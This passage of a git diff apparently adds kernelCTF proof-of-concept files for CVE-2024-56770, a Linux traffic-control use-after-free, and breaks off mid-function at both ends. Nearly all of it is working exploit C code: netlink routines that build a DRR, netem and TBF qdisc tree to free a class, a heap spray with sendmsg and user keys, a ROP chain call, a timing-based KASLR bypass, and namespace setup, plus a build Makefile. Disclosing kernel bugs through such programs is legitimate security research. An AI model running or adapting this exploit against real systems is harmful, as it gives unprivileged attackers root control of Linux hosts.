protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "netem", 6); + + struct tc_netem_qopt opt = {0,}; + + opt.latency = latency; + opt.limit = 1000; + + addattr_l(msg, 0x1000, TCA_OPTIONS, &opt, sizeof(struct tc_netem_qopt)); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_qdisc_tbf(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "tbf", 4); + + struct tc_tbf_qopt opt = {0,}; + opt.rate.rate = 1000 * 1000 / 8; // 1Mbit + opt.limit = 0x1e54; + opt.buffer = 0xb8d080; + + uint32_t burst = 1514; + + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_l(msg, 0x1000, TCA_TBF_PARMS, &opt, sizeof(struct tc_tbf_qopt)); + addattr_l(msg, 0x1000, TCA_TBF_BURST, &burst, sizeof(uint32_t)); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_class_drr(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg = msg + msg->nlmsg_len; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWTCLASS; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "drr", 4); + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int del_class_drr(int fd, uint32_t handle) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg = msg + msg->nlmsg_len; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST; + msg->nlmsg_type = RTM_DELTCLASS; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = TC_H_ROOT; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + return 1; +} + +int add_filter_basic(int fd, uint32_t parent, uint32_t classid) { + char *start = malloc(0x2000); + memset(start, 0, 0x2000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + char sel[0x100] = {0,}; + + msg = msg + msg->nlmsg_len; + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWTFILTER; + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = 0; + + uint32_t prio = 0; + uint32_t protocol = 0x300; + + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "basic", 6); + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_l(msg, 0x1000, TCA_BASIC_CLASSID, &classid, 4); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + return 1; +} + +void spray_sendmsg(char *buff, size_t size) { + struct msghdr msg = {0}; + struct sockaddr_in addr = {0}; + int sockfd = socket(AF_INET, SOCK_DGRAM, 0); + + addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + addr.sin_family = AF_INET; + addr.sin_port = htons(6666); + + msg.msg_control = buff; + msg.msg_controllen = size; + msg.msg_name = (caddr_t)&addr; + msg.msg_namelen = sizeof(addr); + + sendmsg(sockfd, &msg, 0); +} + +#define USER_KEY_PAYLOAD_HEADER_LEN 0x18 +int keys[0x1000]; + +/* + * Allocate a user_key_payload structure. + */ +int key_alloc(int i, char *buff, size_t size) +{ + char desc[256] = { 0 }; + key_serial_t key; + char *payload; + + sprintf(desc, "payload_%d", i); + + size -= USER_KEY_PAYLOAD_HEADER_LEN; + payload = buff ? buff : calloc(1, size); + + if (!buff) + *(uint64_t *)&payload[0] = i; // Tag the key + + keys[i] = add_key("user", desc, payload, size, KEY_SPEC_PROCESS_KEYRING); + + if (keys[i] < 0) { + perror("[x] key_alloc()"); + return -1; + } + + return 0; +} + +#ifndef SOL_UDP +#define SOL_UDP 17 // UDP protocol value for setsockopt +#endif + +#ifndef UDP_SEGMENT +#define UDP_SEGMENT 103 // GSO segmentation option +#endif + +void loopback_send (uint64_t p, uint64_t size) { + struct sockaddr iaddr = { AF_INET }; + int priority = p; + char data[0x4000] = {0,}; + + int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0); + + if (inet_sock_fd == -1) + err_exit("[-] inet socket"); + + setsockopt(inet_sock_fd, SOL_SOCKET, SO_PRIORITY, &priority, sizeof(priority)); + + int gso_size = 1300; + + setsockopt(inet_sock_fd, SOL_UDP, UDP_SEGMENT, &gso_size, sizeof(gso_size)); + + if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] connect"); + + if (write(inet_sock_fd, data, size) == -1) + err_exit("[-] inet write"); + + close(inet_sock_fd); +} + +int ip_link_set_lo_mtu_1500() { + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifinfo; + char buffer[NETLINK_BUFSIZE]; + } req; + + struct sockaddr_nl sa; + struct iovec iov; + struct msghdr msg; + int sock; + int lo_ifindex; + struct rtattr *rta; + + int mtu_value = 1500; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + return -1; + } + + lo_ifindex = if_nametoindex("lo"); + if (lo_ifindex == 0) { + perror("if_nametoindex"); + close(sock); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + + rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.nlh.nlmsg_len)); + rta->rta_type = IFLA_MTU; + rta->rta_len = RTA_LENGTH(sizeof(int)); + memcpy(RTA_DATA(rta), &mtu_value, sizeof(int)); + req.nlh.nlmsg_len = NLMSG_ALIGN(req.nlh.nlmsg_len) + RTA_LENGTH(sizeof(int)); + + memset(&sa, 0, sizeof(sa)); + sa.nl_family = AF_NETLINK; + + iov.iov_base = &req; + iov.iov_len = req.nlh.nlmsg_len; + memset(&msg, 0, sizeof(msg)); + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + + if (sendmsg(sock, &msg, 0) < 0) { + perror("sendmsg"); + close(sock); + return -1; + } + + close(sock); + return 0; +} + +// 156250 = PSCHED_NS2TICKS(10000000) +#define NETEM_10MS 156250 + +#define MTU_VALUE 1500 + +// The freed object is reclaimed immediately +// Spraying a small number of objects is enough +#define SPRAY_COUNT 5 +#define SPRAY_SIZE 512 // kmalloc-512 +#define SPRAY_KEY_SIZE 264 // kmalloc-512 + +void exploit(){ + char *buf = malloc(0x1000); + memset(buf, 0, 0x200); + + const unsigned int drr_qdisc = 0x10000; + const unsigned int drr_class_uaf = 0x10001; + + const unsigned int drr_qdisc_trigger = 0x20000; + const unsigned int drr_class_trigger = 0x20001; + const unsigned int drr_class_delay = 0x20002; + + const unsigned int netem_qdisc_trigger = 0x30000; + const unsigned int netem_qdisc_delay = 0x50000; + + const unsigned int tbf_qdisc = 0x40000; + + sockfd = socket(PF_NETLINK, SOCK_RAW, 0); + + add_qdisc_drr(sockfd, TC_H_ROOT, drr_qdisc); + add_filter_basic(sockfd, drr_qdisc, drr_class_uaf); + add_class_drr(sockfd, drr_qdisc, drr_class_uaf); + + add_qdisc_drr(sockfd, drr_class_uaf, drr_qdisc_trigger); + add_class_drr(sockfd, drr_qdisc_trigger, drr_class_trigger); + add_class_drr(sockfd, drr_qdisc_trigger, drr_class_delay); + + add_qdisc_netem(sockfd, drr_class_trigger, netem_qdisc_trigger, NETEM_10MS); + add_qdisc_tbf(sockfd, netem_qdisc_trigger, tbf_qdisc); + + add_qdisc_netem(sockfd, drr_class_delay, netem_qdisc_delay, NETEM_10MS); + + loopback_send(drr_class_trigger, MTU_VALUE+1); + + // wait for netem delay + usleep(50*1000); + + // preventing `drr_delete_class()` from calling `list_del` because `drr_qdisc_trigger` has a qlen of 0 + loopback_send(drr_class_trigger, MTU_VALUE); + + del_class_drr(sockfd, drr_class_trigger); + + // wait for qdisc_put() done + usleep(50*1000); + + // make the qlen of drr_qdisc_trigger 0 + loopback_send(drr_class_delay, MTU_VALUE); + + del_class_drr(sockfd, drr_class_uaf); + + // wait for qdisc_put() done + usleep(50*1000); + + char rop_data[SPRAY_SIZE+1] = {0,}; + rop_chain((uint64_t*) rop_data); + + for(int i = 0 ; i < SPRAY_COUNT; i++){ + spray_sendmsg(rop_data, SPRAY_SIZE); + key_alloc(i, rop_data+USER_KEY_PAYLOAD_HEADER_LEN, SPRAY_KEY_SIZE); + } + + spray_sendmsg(rop_data, SPRAY_SIZE); + + loopback_send(drr_class_uaf, MTU_VALUE); +} + +int main(int argc, char **argv) { + save_state(); + + new_ns(); + + set_affinity(0); + + bypass_kaslr(0); + + ip_link_lo_up(); + + ip_link_set_lo_mtu_1500(); + + exploit(); +} \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/Makefile b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/Makefile new file mode 100644 index 000000000..00b0521c3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/Makefile @@ -0,0 +1,5 @@ +exploit: + gcc -o exploit ./exploit.c -lkeyutils -static + +prerequisites: + sudo apt-get install libkeyutils-dev \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/exploit b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/exploit new file mode 100755 index 000000000..051df917a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c new file mode 100644 index 000000000..65d893c99 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-56770_cos_mitigation/exploit/mitigation-v3b-6.1.55/exploit.c @@ -0,0 +1,1177 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include + +#include +#include +#include + +#include + +uint64_t kbase = 0; + +#define MMAP_ADDR 0xa00000 +#define MMAP_SIZE 0x2000 + +// KASLR bypass +// +// This code is adapted from https://github.com/IAIK/prefetch/blob/master/cacheutils.h +// +inline __attribute__((always_inline)) uint64_t rdtsc_begin() { + uint64_t a, d; + asm volatile ("mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "lfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) uint64_t rdtsc_end() { + uint64_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "lfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch(void* p) +{ + asm volatile ( + "prefetchnta (%0)\n" + "prefetcht2 (%0)\n" + : : "r" (p)); +} + +size_t flushandreload(void* addr) // row miss +{ + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +size_t bypass_kaslr(uint64_t base) +{ + if (!base) + { +#ifdef KASLR_BYPASS_INTEL +#define OFFSET 0 +#define START (0xffffffff81000000ull + OFFSET) +#define END (0xffffffffD0000000ull + OFFSET) +#define STEP 0x0000000001000000ull + while (1) + { + uint64_t bases[7] = {0}; + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) + { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + size_t minv = ~0; + size_t mini = -1; + for (int ti = 0; ti < ARRAY_LEN(times) - 1; ti++) + { + if (times[ti] < minv) + { + mini = ti; + minv = times[ti]; + } + } + + if (mini < 0) + { + return -1; + } + + bases[vote] = addrs[mini]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (c == 0) + { + base = bases[i]; + } + else if (base == bases[i]) + { + c++; + } + else + { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (base == bases[i]) + { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) + { + base -= OFFSET; + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#else +#define START (0xffffffff81000000ull) +#define END (0xffffffffc0000000ull) +#define STEP 0x0000000000200000ull +#define NUM_TRIALS 15 +// largest contiguous mapped area at the beginning of _stext +#define WINDOW_SIZE 11 + + while (1) + { + uint64_t bases[NUM_TRIALS] = {0}; + + for (int vote = 0; vote < ARRAY_LEN(bases); vote++) + { + size_t times[(END - START) / STEP] = {}; + uint64_t addrs[(END - START) / STEP]; + + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + times[ti] = ~0; + addrs[ti] = START + STEP * (uint64_t)ti; + } + + for (int i = 0; i < 16; i++) + { + for (int ti = 0; ti < ARRAY_LEN(times); ti++) + { + uint64_t addr = addrs[ti]; + size_t t = flushandreload((void *)addr); + if (t < times[ti]) + { + times[ti] = t; + } + } + } + + uint64_t max = 0; + int max_i = 0; + for (int ti = 0; ti < ARRAY_LEN(times) - WINDOW_SIZE; ti++) + { + uint64_t sum = 0; + for (int i = 0; i < WINDOW_SIZE; i++) + { + sum += times[ti + i]; + } + if (sum > max) + { + max = sum; + max_i = ti; + } + } + + bases[vote] = addrs[max_i]; + } + + int c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (c == 0) + { + base = bases[i]; + } + else if (base == bases[i]) + { + c++; + } + else + { + c--; + } + } + + c = 0; + for (int i = 0; i < ARRAY_LEN(bases); i++) + { + if (base == bases[i]) + { + c++; + } + } + if (c > ARRAY_LEN(bases) / 2) + { + if ((base % 0x1000000) == 0) + goto got_base; + } + + printf("majority vote failed:\n"); + printf("base = %llx with %d votes\n", base, c); + } +#endif + } + +got_base: + + printf("using kernel base %llx\n", base); + + kbase = base; + + return 0; +} + +void write_file(const char *filename, char *text) { + int fd = open(filename, O_RDWR | O_CREAT, 0600); + + write(fd, text, strlen(text)); + close(fd); +} + +void new_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + char buffer[0x100]; + + unshare(CLONE_NEWUSER | CLONE_NEWNS); + + unshare(CLONE_NEWNET); + + write_file("/proc/self/setgroups", "deny"); + + snprintf(buffer, sizeof(buffer), "0 %d 1", uid); + write_file("/proc/self/uid_map", buffer); + snprintf(buffer, sizeof(buffer), "0 %d 1", gid); + write_file("/proc/self/gid_map", buffer); +} + +void set_affinity(int cpuid){ + cpu_set_t my_set; + int cpu_cores = sysconf(_SC_NPROCESSORS_ONLN); + + if (cpu_cores == 1) return; + + CPU_ZERO(&my_set); + + CPU_SET(cpuid, &my_set); + + if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) { + perror("[-] sched_setaffinity()"); + exit(EXIT_FAILURE); + } +} + +#define NETLINK_BUFSIZE 4096 + +int ip_link_lo_up() { + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifinfo; + char buffer[NETLINK_BUFSIZE]; + } req; + + struct sockaddr_nl sa; + struct iovec iov; + struct msghdr msg; + int sock; + int lo_ifindex; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + return -1; + } + + lo_ifindex = if_nametoindex("lo"); + if (lo_ifindex == 0) { + perror("if_nametoindex"); + close(sock); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + req.ifinfo.ifi_change = 0xFFFFFFFF; + req.ifinfo.ifi_flags = IFF_UP | IFF_RUNNING; + + memset(&sa, 0, sizeof(sa)); + sa.nl_family = AF_NETLINK; + + iov.iov_base = &req; + iov.iov_len = req.nlh.nlmsg_len; + memset(&msg, 0, sizeof(msg)); + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + + if (sendmsg(sock, &msg, 0) < 0) { + perror("sendmsg"); + close(sock); + return -1; + } + + close(sock); + return 0; +} + +int ip_link_set_lo_mtu_1500() { + struct { + struct nlmsghdr nlh; + struct ifinfomsg ifinfo; + char buffer[NETLINK_BUFSIZE]; + } req; + + struct sockaddr_nl sa; + struct iovec iov; + struct msghdr msg; + int sock; + int lo_ifindex; + struct rtattr *rta; + + int mtu_value = 1500; + + sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (sock < 0) { + perror("socket"); + return -1; + } + + lo_ifindex = if_nametoindex("lo"); + if (lo_ifindex == 0) { + perror("if_nametoindex"); + close(sock); + return -1; + } + + memset(&req, 0, sizeof(req)); + req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + req.nlh.nlmsg_type = RTM_NEWLINK; + req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + req.ifinfo.ifi_family = AF_UNSPEC; + req.ifinfo.ifi_index = lo_ifindex; + + rta = (struct rtattr *)(((char *)&req) + NLMSG_ALIGN(req.nlh.nlmsg_len)); + rta->rta_type = IFLA_MTU; + rta->rta_len = RTA_LENGTH(sizeof(int)); + memcpy(RTA_DATA(rta), &mtu_value, sizeof(int)); + req.nlh.nlmsg_len = NLMSG_ALIGN(req.nlh.nlmsg_len) + RTA_LENGTH(sizeof(int)); + + memset(&sa, 0, sizeof(sa)); + sa.nl_family = AF_NETLINK; + + iov.iov_base = &req; + iov.iov_len = req.nlh.nlmsg_len; + memset(&msg, 0, sizeof(msg)); + msg.msg_name = &sa; + msg.msg_namelen = sizeof(sa); + msg.msg_iov = &iov; + msg.msg_iovlen = 1; + + if (sendmsg(sock, &msg, 0) < 0) { + perror("sendmsg"); + close(sock); + return -1; + } + + close(sock); + return 0; +} + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +#define NLMSG_TAIL(nmsg) \ +((struct rtattr *)(((void *)(nmsg)) + NLMSG_ALIGN((nmsg)->nlmsg_len))) + +int addattr_l(struct nlmsghdr *n, int maxlen, int type, const void *data, + int alen) { + int len = RTA_LENGTH(alen); + struct rtattr *rta; + + if (NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len) > maxlen) { + fprintf(stderr, "addattr_l ERROR: message exceeded bound of %d\n", maxlen); + return -1; + } + + rta = NLMSG_TAIL(n); + rta->rta_type = type; + rta->rta_len = len; + + if (alen) + memcpy(RTA_DATA(rta), data, alen); + + n->nlmsg_len = NLMSG_ALIGN(n->nlmsg_len) + RTA_ALIGN(len); + return 0; +} + +struct rtattr *addattr_nest(struct nlmsghdr *n, int maxlen, int type) { + struct rtattr *nest = NLMSG_TAIL(n); + + addattr_l(n, maxlen, type, NULL, 0); + return nest; +} + +int addattr_nest_end(struct nlmsghdr *n, struct rtattr *nest) { + nest->rta_len = (void *)NLMSG_TAIL(n) - (void *)nest; + return n->nlmsg_len; +} + +int add_veth_link(const char *name, const char *peer_name, int num_rx_queues, int num_tx_queues) { + int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (fd < 0) { + perror("socket"); + return -1; + } + + char *start = malloc(NETLINK_BUFSIZE); + memset(start, 0, NETLINK_BUFSIZE); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + // Netlink message header + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifinfomsg)); + msg->nlmsg_type = RTM_NEWLINK; + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL; + + struct ifinfomsg *ifi = (struct ifinfomsg *)(start + sizeof(struct nlmsghdr)); + ifi->ifi_family = AF_UNSPEC; + + // Interface name attribute + addattr_l(msg, NETLINK_BUFSIZE, IFLA_IFNAME, name, strlen(name) + 1); + + // Device type (veth) + struct rtattr *linkinfo = addattr_nest(msg, NETLINK_BUFSIZE, IFLA_LINKINFO); + addattr_l(msg, NETLINK_BUFSIZE, IFLA_INFO_KIND, "veth", strlen("veth") + 1); + + // Link info data for peer + struct rtattr *linkdata = addattr_nest(msg, NETLINK_BUFSIZE, IFLA_INFO_DATA); + struct rtattr *peer = addattr_nest(msg, NETLINK_BUFSIZE, VETH_INFO_PEER); + + // Peer attributes + struct ifinfomsg peer_ifi = { .ifi_family = AF_UNSPEC }; + addattr_l(msg, NETLINK_BUFSIZE, IFLA_IFNAME, peer_name, strlen(peer_name) + 1); + memcpy(((char *)msg) + NLMSG_ALIGN(msg->nlmsg_len), &peer_ifi, sizeof(peer_ifi)); + msg->nlmsg_len += NLMSG_ALIGN(sizeof(peer_ifi)); + + addattr_nest_end(msg, peer); + addattr_nest_end(msg, linkdata); + addattr_nest_end(msg, linkinfo); + + // RX and TX queues + addattr_l(msg, NETLINK_BUFSIZE, IFLA_NUM_RX_QUEUES, &num_rx_queues, sizeof(num_rx_queues)); + addattr_l(msg, NETLINK_BUFSIZE, IFLA_NUM_TX_QUEUES, &num_tx_queues, sizeof(num_tx_queues)); + + // Send Netlink message + struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK }; + struct iovec iov = { .iov_base = msg, .iov_len = msg->nlmsg_len }; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + if (sendmsg(fd, &msgh, 0) < 0) { + perror("sendmsg"); + free(start); + return -1; + } + + free(start); + close(fd); + + return 0; +} + +int add_qdisc_drr(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "drr", 4); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_qdisc_netem(int fd, uint32_t parent, uint32_t handle, int64_t latency) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "netem", 6); + + struct tc_netem_qopt opt = {0,}; + + opt.latency = latency; + opt.limit = 1000; + + addattr_l(msg, 0x1000, TCA_OPTIONS, &opt, sizeof(struct tc_netem_qopt)); + + struct iovec iov = {.iov_base = msg, .iov_len = msg->nlmsg_len}; + struct sockaddr_nl nladdr = {.nl_family = AF_NETLINK}; + struct msghdr msgh = { + .msg_name = &nladdr, + .msg_namelen = sizeof(nladdr), + .msg_iov = &iov, + .msg_iovlen = 1, + }; + + sendmsg(fd, &msgh, 0); + + free(start); + + return 1; +} + +int add_qdisc_tbf(int fd, uint32_t parent, uint32_t handle) { + char *start = malloc(0x1000); + memset(start, 0, 0x1000); + struct nlmsghdr *msg = (struct nlmsghdr *)start; + + msg->nlmsg_len = NLMSG_LENGTH(sizeof(struct tcmsg)); + msg->nlmsg_flags = NLM_F_REQUEST | NLM_F_EXCL | NLM_F_CREATE; + msg->nlmsg_type = RTM_NEWQDISC; + + struct tcmsg *t = (struct tcmsg *)(start + sizeof(struct nlmsghdr)); + + t->tcm_ifindex = 1; + t->tcm_family = AF_UNSPEC; + t->tcm_parent = parent; + t->tcm_handle = handle; + + uint32_t prio = 1; + uint32_t protocol = 1; + t->tcm_info = TC_H_MAKE(prio << 16, protocol); + + addattr_l(msg, 0x1000, TCA_KIND, "tbf", 4); + + struct tc_tbf_qopt opt = {0,}; + opt.rate.rate = 1000 * 1000 / 8; // 1Mbit + opt.limit = 0x1e54; + opt.buffer = 0xb8d080; + + uint32_t burst = 1514; + + struct rtattr *tail = addattr_nest(msg, 0x1000, TCA_OPTIONS); + addattr_l(msg, 0x1000, TCA_TBF_PARMS, &opt, sizeof(struct tc_tbf_qopt)); + addattr_l(msg, 0x1000, TCA_TBF_BURST, &burst, sizeof(uint32_t)); + addattr_nest_end(msg, tail); + + struct iovec iov = {.iov_base = msg, .iov_len = 